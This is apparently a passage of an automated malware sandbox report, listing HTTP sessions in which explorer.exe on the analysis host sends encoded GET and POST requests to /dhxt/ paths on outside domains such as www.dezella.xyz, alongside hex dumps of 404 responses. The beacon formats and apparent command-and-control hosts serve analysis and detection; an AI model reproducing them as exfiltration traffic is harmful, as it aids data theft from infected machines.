                                                                                                              Data Ascii: 53.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g>
                                                                                                              Feb 6, 2023 14:38:57.244378090 CET152INData Raw: 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09 63 33 2e 38 32 39 2c 36 2e 36 36 34 2c 31 32 2e 33
                                                                                                              Data Ascii: .536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                                                                                                              Feb 6, 2023 14:38:57.410962105 CET154INData Raw: 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 6c 65
                                                                                                              Data Ascii: 54,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              8192.168.2.449703199.192.28.12180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:59.710459948 CET156OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ== HTTP/1.1
                                                                                                              Host: www.dezella.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:59.995573044 CET158INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:59 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 16026
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 63 2d 31 2e 32 34 37 2c 34 2e 36 35 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.651-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.10
                                                                                                              Feb 6, 2023 14:38:59.995618105 CET159INData Raw: 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 35 36 2d 32 2e 38 32 2c 33 2e 31 38 31 2d 34 2e 38 36 38 2c 36 2e 30 38 38 2d 35 2e 31 33 0a 20 20 20 20
                                                                                                              Data Ascii: 1-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath>
                                                                                                              Feb 6, 2023 14:38:59.995645046 CET160INData Raw: 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 34 38 33 2e 39 38 35 2c 31 32 37
                                                                                                              Data Ascii: stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig">
                                                                                                              Feb 6, 2023 14:38:59.995675087 CET162INData Raw: 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74
                                                                                                              Data Ascii: .952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g>
                                                                                                              Feb 6, 2023 14:38:59.995944977 CET163INData Raw: 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20
                                                                                                              Data Ascii: 5" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" />
                                                                                                              Feb 6, 2023 14:38:59.995979071 CET164INData Raw: 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36
                                                                                                              Data Ascii: 7" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" /> </g>
                                                                                                              Feb 6, 2023 14:38:59.996005058 CET166INData Raw: 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20
                                                                                                              Data Ascii: e="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
                                                                                                              Feb 6, 2023 14:38:59.996036053 CET167INData Raw: 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                                                                              Data Ascii: <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)">
                                                                                                              Feb 6, 2023 14:38:59.996062040 CET168INData Raw: 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20
                                                                                                              Data Ascii: "295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g
                                                                                                              Feb 6, 2023 14:38:59.996089935 CET170INData Raw: 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09 63 33
                                                                                                              Data Ascii: 1,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejo
                                                                                                              Feb 6, 2023 14:39:00.165874004 CET171INData Raw: 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: 6.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoi


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              9192.168.2.449704132.148.233.23580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:05.377790928 CET175OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.staciesellslka.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.staciesellslka.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.staciesellslka.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 76 64 41 45 79 6a 55 51 47 39 64 69 61 71 4d 6a 33 7a 41 62 67 6b 41 37 4b 32 70 55 69 58 41 4a 67 6f 6c 4c 61 36 28 45 79 4c 74 70 4f 55 43 36 35 5a 4e 71 65 66 59 2d 61 2d 4a 4e 66 45 55 55 50 4e 78 59 41 4b 59 4f 59 47 6d 69 42 49 56 43 53 35 73 66 75 45 34 58 57 6d 72 4c 62 48 4a 65 42 4a 74 52 56 4f 38 52 6b 2d 32 66 65 7a 49 31 33 51 6e 71 7a 45 68 64 31 47 51 63 73 43 74 47 75 37 78 36 4e 77 58 49 48 79 7e 58 49 72 4c 46 55 49 59 54 33 4a 62 55 52 46 79 6e 76 46 41 6e 74 43 49 6c 68 72 59 32 53 36 62 78 62 38 64 5a 4b 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=vdAEyjUQG9diaqMj3zAbgkA7K2pUiXAJgolLa6(EyLtpOUC65ZNqefY-a-JNfEUUPNxYAKYOYGmiBIVCS5sfuE4XWmrLbHJeBJtRVO8Rk-2fezI13QnqzEhd1GQcsCtGu7x6NwXIHy~XIrLFUIYT3JbURFynvFAntCIlhrY2S6bxb8dZKQ).
                                                                                                              Feb 6, 2023 14:39:05.677381039 CET176INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:05 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.4.33
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 11491
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 97 db 36 92 e8 e7 f4 39 f9 0f 08 7d 9c 6e ed 88 12 49 bd d5 8f 4c a7 e3 cc 78 f3 98 8c ed 99 d9 7b 77 f7 f4 a1 48 48 a2 4d 91 0a 49 b5 ba d3 e3 1f b4 7f e3 fe b2 5b 85 07 09 be 24 b5 24 27 99 b5 9d d8 dd 04 0b 55 85 42 a1 00 14 0a c5 8b 2f be f9 cb cd 9b ff f3 d3 0b 32 4f 16 fe d5 c9 05 fe 20 8e 6f c7 f1 a5 66 df d9 ae ad 63 89 ee db 0f e1 2a d1 d7 9e 4b 89 52 3c a7 b6 4b 23 7d 19 c6 5e e2 85 81 9e 84 4b 8d f8 76 30 bb d4 68 a0 ff ed b5 46 96 11 9d 7a f7 97 5a 38 1b 03 89 64 39 6e b7 c3 d9 b2 b5 a0 ed 20 7e 46 a6 93 72 69 7b 3a 79 a6 21 27 80 fb ea e4 b3 8b 05 4d 6c 06 a4 d3 9f 57 de dd a5 f6 1f fa df ae f5 9b 70 b1 b4 13 6f e2 53 8d 38 61 90 d0 20 b9 d4 5e be b8 a4 ee 0c 4a da 95 15 6f 38 9c fe e6 61 a9 d6 4a e8 7d d2 c6 e6 9c 13 67 6e 47 31 4d 2e 57 c9 54 1f 6a 19 96 c0 5e d0 4b ed ce a3 eb 65 18 25 4a 5d 10 48 32 bf 74 e9 9d e7 50 9d 3d 34 89 17 80 30 6c 5f 8f 1d db a7 97 a6 e0 26 f1 12 9f 5e fd 64 cf 28 09 c2 84 4c c3 55 e0 92 2f 9f 0d 2d d3 3c 27 df db ef 28 b9 0e 02 9b bc a2 b6 4f 5e c4 89 9d d0 8b 36 af 73 a2 f0 70 1a 85 93 30 89 4f 53 0e 4e 17 f6 bd ee 2d 00 ad 0e a2 46 0e c7 be 1d cd e8 29 52 bd f0 bd e0 1d 89 a8 7f 79 ea 06 31 02 4c 69 e2 cc 4f c9 1c 7e bb 3c 6d b7 df d1 38 81 d7 2d cf bd 9f 87 0b da 72 c2 45 a1 a2 66 fb 09 8d 02 60 47 23 09 c8 0d 0a 96 4b df 73 6c ec ef 76 14 c7 7f b8 5f f8 f0 0a 39 bd d4 2a db 41 be 8c ec 9f 57 e1 39 f9 96 52 57 e3 b4 35 ec 97 18 ba 7d bd 5e b7 00 ca f1 68 4c 7d 3f f6 df d9 c8 44 7b 0a a0 6d ed c3 b1 02 ea b3 00 f1 c5 4f e1 c9 11 75 14 e6 3e c3 3f 0a 87 f1 1c d4 c3 59 25 c4 83 fe 51 d1 d6 63 5d 2f 75 d1 97 ed d5 d2 0f 6d 37 6e 5b 86 d5 69 1b 56 db 0f 67 a1 de ef b6 de 2e 67 b2 c5 ac a7 db d0 e3 0c 3f e3 40 30 f1 85 ae 93 6b 90 07 25 6f c2 95 33 27 2f 01 82 e8 3a e3 51 95 21 82 c0 38 05 10 81 24 f6 7e a1 30 d8 cd a1 71 0f 7f 8f c3 34 20 62 5c 17 f9 0b dc 28 f4 dc 3a de f2 fc 8c ac 7b f8 7b 24 7e 46 56 15 3f 3f bc 26 2f c0 5e e4 f9 51 06 fc 22 56 34 4c 7f e3 f9 f4 25 ca 5f 19 ff 87 b1 65 0d 32 31 a9 92 38 8d 93 07 9f c6 73 4a 93 53 e2 b9 97 a7 80 88 0f 6e 3d f6 3d 66 71 a3 50 5f ae 26 c0 db 2d 10 9a 78 01 d5 9d 38 96 03 7b 67 ae 96 fe 6a e6 81 c9 85 a2 59 18 ce 40 33 96 be ed d0 38 4f ad cd 29 b5 81 02 40 c2 ab 02 e9 16 bc f8 ea 8e 46 97 a6 d9 1a 9e 72 4d 3d 65 56 95 f1 b4 a0 ae 67 5f 9e da be 5f 34 4a 15 cd fc c5 f3 fd 70 5d 6c 2d 27 97 d0 05 b0 97 50 f3 d0 b6 56 11 a9 6d 64 4a 35 6d a6 d5 1a 1c d6 4a 4e ff 76 dd f9 f0 0d 49 49 1d 8b fb 55 20 3a e5 c3 f7 41 7c 2b 89 1d 9d 79 17 26 d1 5f b5 05 8c e2 b1 9a e1 cc 3d
                                                                                                              Data Ascii: }k69}nILx{wHHMI[$$'UB/2O ofc*KR<K#}^Kv0hFzZ8d9n ~Fri{:y!'MlWpoS8a ^Jo8aJ}gnG1M.WTj^Ke%J]H2tP=40l_&^d(LU/-<'(O^6sp0OSN-F)Ry1LiO~<m8-rEf`G#Kslv_9*AW9RW5}^hL}?D{mOu>?Y%Qc]/um7n[iVg.g?@0k%o3'/:Q!8$~0q4 b\(:{{$~FV??&/^Q"V4L%_e218sJSn==fqP_&-x8{gjY@38O)@FrM=eVg__4Jp]l-'PVmdJ5mJNvIIU :A|+y&_=
                                                                                                              Feb 6, 2023 14:39:05.677426100 CET177INData Raw: df d5 59 e9 5e 8d 48 e6 74 41 e3 f6 35 5b c8 dd 30 64 6f b0 a8 cd 50 a6 5c f6 5b 66 cb 3c 84 cf e9 2a 46 c3 e9 3e 80 39 f5 1c 64 75 2f 76 a5 ed 14 e8 38 95 b6 d3 31 9d 51 b7 6f 39 8e e3 f6 ad 21 ed d8 86 6b f5 9d a1 39 19 4d e8 60 d2 6b 2d bc 20
                                                                                                              Data Ascii: Y^HtA5[0doP\[f<*F>9du/v81Qo9!k9M`k- mJ5jY;LT$5.*Nmo>eQ[m|zuwQZ^+yEC__#Zd'ekZhqaYKe-^fGZP+Z:| )za$_EVy
                                                                                                              Feb 6, 2023 14:39:05.677535057 CET179INData Raw: 94 c0 be 21 6a 3d 5c 25 d8 de 94 81 d5 04 2c 6f b0 e2 0e 6d 22 6a b2 e3 2a d0 3d 36 5c 88 12 0d 00 a8 b3 90 00 3b 86 f6 dc 53 17 0b f1 00 7c 6e bb e1 5a 97 e0 d0 e5 20 0b a1 99 fa 74 e5 fb 4a bd 5f 68 04 6c f2 41 26 20 14 5e e1 57 d9 44 c6 5b c9
                                                                                                              Data Ascii: !j=\%,om"j*=6\;S|nZ tJ_hlA& ^WD[J>[,vE_|'wWD%p;i-}zI2s>Q$ut?v!p@P;A%HVE:IYQCCYR`P(bag]33oM'$
                                                                                                              Feb 6, 2023 14:39:05.677701950 CET180INData Raw: ba c0 97 3f 39 4d 38 5c 15 64 24 f4 11 f5 a0 8c f2 10 25 10 d8 7a d5 1a 60 a9 1a 30 1c 55 29 c0 70 f4 1b f7 7f b9 05 c5 ce 57 36 c4 f2 5a 83 b0 65 e8 64 90 b6 b4 72 63 9a ba af f2 2b e0 1f a0 58 ae 7a cb f6 50 b8 b8 84 c7 4b 43 cc e8 18 13 bb 5a
                                                                                                              Data Ascii: ?9M8\d$%z`0U)pW6Zedrc+XzPKCZQN/HMP2]9l'WK#tQKt`>fuO8JlB3yj7+XjR>Xa#+sIzp;=5l5YxInz"!
                                                                                                              Feb 6, 2023 14:39:05.677880049 CET181INData Raw: b1 05 8d 98 5d 48 76 e7 26 e5 b8 14 1d c5 6f 40 a5 ad bc e5 75 78 80 7f e3 bc d0 c0 7c db f8 ed 2b f1 90 bb e8 65 9a bc f1 a4 bc a5 f7 3d 11 ed 65 63 f4 aa 1d 60 f2 34 1e b1 99 0f e7 2a f2 c5 d6 76 92 ad ad 5e 80 8a 58 22 8f 4b 2c b5 6d 79 13 c2
                                                                                                              Data Ascii: ]Hv&o@ux|+e=ec`4*v^X"K,myu.teQUb~dS]\v|ZO':>uoK#]-KSWV]8TOrQUsp}j:hE3;w-2M":=[lZW7v33:d=H@
                                                                                                              Feb 6, 2023 14:39:05.678050995 CET183INData Raw: 64 2e 26 11 fa cd 7e 40 4f 8d ed 37 c9 df af 89 d5 31 cd 81 58 d4 17 13 ab 71 e8 fa a4 5f 9b 56 ef 6a f6 2c 52 51 56 da 3a 29 21 5a 99 0e e7 fc 01 a5 62 e1 27 29 95 97 dc 3a f7 d2 27 93 c7 ae bc 28 fb 70 d2 57 25 2a ca bb 02 25 76 5e c3 7a 21 e6
                                                                                                              Data Ascii: d.&~@O71Xq_Vj,RQV:)!Zb'):'(pW%*%v^z!tlb~4F~iMZM"p./Q;uw[Mptl*eyrrMGmV8'iYr1;L*eb_=(sn'&Qy=R=;6$C;vCzdj=_6F_)M
                                                                                                              Feb 6, 2023 14:39:05.678193092 CET184INData Raw: ee e3 84 d9 bd 93 e2 61 52 18 50 91 95 07 c5 a8 7e 6c 8c 95 a2 0b 53 7c cd 24 b1 27 e8 ee bc 87 be 32 b5 2c 3b 56 c5 45 3d 96 ee 84 85 e7 60 4d f1 d5 c4 dc 15 96 dc b7 3d f9 77 69 45 4a 8e 8b f8 6e 46 58 8c 54 ee e3 0b 3c 32 aa 8d 71 51 18 52 a5
                                                                                                              Data Ascii: aRP~lS|$'2,;VE=`M=wiEJnFXT<2qQRtl)Z4tV2&K65&%GO~?A>wSeZ]bx1}r0A9vNEC7BSzzD8MPUWZ^\5Vo8 -2]x7
                                                                                                              Feb 6, 2023 14:39:05.678328037 CET185INData Raw: 82 ad 7d d4 75 58 d4 e9 4b 20 4b 13 5d dc d1 86 c5 9d ed bc 1b 93 67 06 fb 73 5e 09 e3 3c d8 01 ae 02 bd 78 ce 0e db 00 dc 9e 4c 86 4e a7 1a 9c a5 ba 01 18 71 d9 b3 12 66 89 9f 12 5c 7a 01 92 9e 0e 86 ae 3d a8 86 bb f3 ee 3c 17 1d c4 00 e7 4c 2d
                                                                                                              Data Ascii: }uXK K]gs^<xLNqf\z=<L-jj8p|xUccVq&UX1`:&sHa#CSgn:O84h3i3Ga1EzQZ\:k<4-k4xgfPe)7jI%VXO,c4
                                                                                                              Feb 6, 2023 14:39:05.678495884 CET187INData Raw: b6 1d 7f d5 1c 5a 75 60 78 10 1f 95 18 2b d7 03 c5 a3 be 83 c8 96 d1 d5 d2 94 07 7e 47 a0 27 51 6d d2 41 3c e2 3b 8e ba 21 a6 3a 3b cf 4e f4 0e 22 93 a1 a9 a0 91 3f bb 3b 88 4e 1e 55 05 2d 79 70 74 10 15 89 a4 02 3f 3b a3 c9 4e 34 1e b3 ac 25 15
                                                                                                              Data Ascii: Zu`x+~G'QmA<;!:;N"?;NU-ypt?;N4%g;U=U0{ d*I;o=9g4@e7{"?w^|UZc3WPzmF:`IT0)SM")rlP81F]/N9\|k+02KAg
                                                                                                              Feb 6, 2023 14:39:05.678522110 CET187INData Raw: fb ff 7e af 5c d9 e3 3f 3f 3f f1 69 42 1c 3f 06 d5 30 ce 3f 3f f9 fc 04 ef 82 ff 44 23 dc 0c e1 05 ef bf 4c 58 42 e0 e8 ec 0c 13 8c 3f 20 47 0d 72 79 45 1e 3f 3f 21 b0 1d 89 c8 19 0b 38 24 ec 2d e6 25 4f c1 b0 ab 5f c0 03 70 71 d6 68 f0 0a 84 a0
                                                                                                              Data Ascii: ~\???iB?0??D#LXB? GryE??!8$-%O_pqh}``s_Q}_UB.9Kpb^>; rka|M^!jF+9{DOX<S!\8vz.,5\,b2ZV$^/i^2DLb8Yvrz


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:14:36:02
